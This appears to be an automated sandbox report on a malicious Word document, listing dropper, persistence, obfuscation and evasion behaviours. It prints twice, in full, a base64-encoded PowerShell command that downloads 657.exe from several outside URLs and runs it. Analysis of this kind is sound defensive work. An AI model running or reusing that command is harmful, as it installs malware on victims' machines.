Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA
Source: unknownProcess created: C:\Users\user\657.exe C:\Users\user\657.exe
Source: unknownProcess created: C:\Windows\System32\eventcreate\eventcreate.exe C:\Windows\system32\eventcreate\eventcreate.exe
Source: C:\Users\user\657.exeProcess created: C:\Windows\System32\eventcreate\eventcreate.exe C:\Windows\system32\eventcreate\eventcreate.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\657.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2005\6.2.20\ScrollerCtrl_demo\ScrollerTest\Release\ScrollerTest.pdb source: 657.exe, eventcreate.exe, 00000004.00000002.1370249042.00401000.00000040.00020000.sdmp

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\657.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_004C0C10
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0043CB3B push ecx; ret 3_2_0043CB4E
Source: C:\Users\user\657.exeCode function: 3_2_0043D669 push ecx; ret 3_2_0043D67C
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00589A9D push ecx; retf 4_2_00589AA3
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Users\user\657.exeExecutable created and started: C:\Windows\System32\eventcreate\eventcreate.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\657.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\657.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\657.exePE file moved: C:\Windows\System32\eventcreate\eventcreate.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\657.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\657.exeFile opened: C:\Windows\system32\eventcreate\eventcreate.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_0040C2F1
Source: C:\Users\user\657.exeCode function: 3_2_0040C2A0 IsIconic,3_2_0040C2A0
Source: C:\Users\user\657.exeCode function: 3_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect,3_2_00412DF2
Source: C:\Users\user\657.exeCode function: 3_2_0042D6B9 IsWindowVisible,IsIconic,3_2_0042D6B9
Source: C:\Users\user\657.exeCode function: 3_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,3_2_00427884
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\657.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\657.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\657.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\657.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\657.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
